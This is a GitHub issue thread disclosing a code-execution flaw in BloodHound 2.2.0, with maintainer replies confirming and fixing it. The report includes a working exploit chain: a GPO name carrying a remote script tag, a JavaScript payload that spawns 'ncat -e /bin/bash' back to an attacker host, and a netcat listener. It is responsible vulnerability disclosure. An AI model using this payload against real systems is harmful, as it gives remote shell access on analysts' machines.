Code execution in Bloodhound via malicious AD Object #267
Comments
|
Hi, i am sure to understand the purpose of the GPO during the entire process - could you clarify please ? Sylvain |
A GPO can have all sorts of characters in its name. That's where the javascript payload is placed. The GPO has no other purpose than being read by sharphound and "export" the payload to sharphound's json output |
|
Thanks for the report, I'll work on fixing this ASAP! I've already
identified the problem code
…On Sun, Aug 25, 2019, 7:03 AM Fab ***@***.***> wrote:
Hi, i am sure to understand the purpose of the GPO during the entire
process - could you clarify please ? Sylvain
A GPO can have all sorts of characters in its name. That's where the
javascript payload is placed. The GPO has no other purpose than being read
by sharphound and "export" the payload to sharphound's json output
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#267>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ABLUS7UM2VA3RZIYNZ4RTADQGJRJZANCNFSM4IPHZJZQ>
.
|
|
I've pushed a potential fix for the issue in c48afcb Going to test it a bit more as well |
|
The fix properly renders the characters as text, not as HTML tags. I also deployed a fix to another potentially injectable portion of the UI at the same time. @6661620a tested my fix as well and confirmed it works. I'm going to close this issue, and push a release out containing this fix. Thanks again @6661620a ! |
Dear Bloodhound Team –
I identified a way to achieve code execution in Bloodhound 2.2.0 by creating a GPO with a name containing JavaScript code that will trigger in Bloodhound's search-autocomplete function. The injected JavaScript is not only a valid xss but also allows the creation of a child process.
The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat:
Create a GPO with the following name:
aaaaaa<SCRIPT SRC="http://<attacker host>:<some port>/poc.js">Run Sharphound
Invoke-BloodHound -StealthImport collected data
Host the following js payload as POC.JS (all uppercase is important here since the sharphound output json always has the value for the name field in upper case)
const { spawn } = require('child_process');spawn('ncat', ['-e', '/bin/bash', '<attacker host>', '<some port>']);e.g. with
python -m SimpleHTTPServer <some port>Start listener
nc -v -l -p <some port>Search for "aa" in Bloodhound and catch the shell
I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than "aaaaa" and I also would not consider JavaScript as one of my strengths but I hope I could prove my point here :)
I also made a video
The text was updated successfully, but these errors were encountered: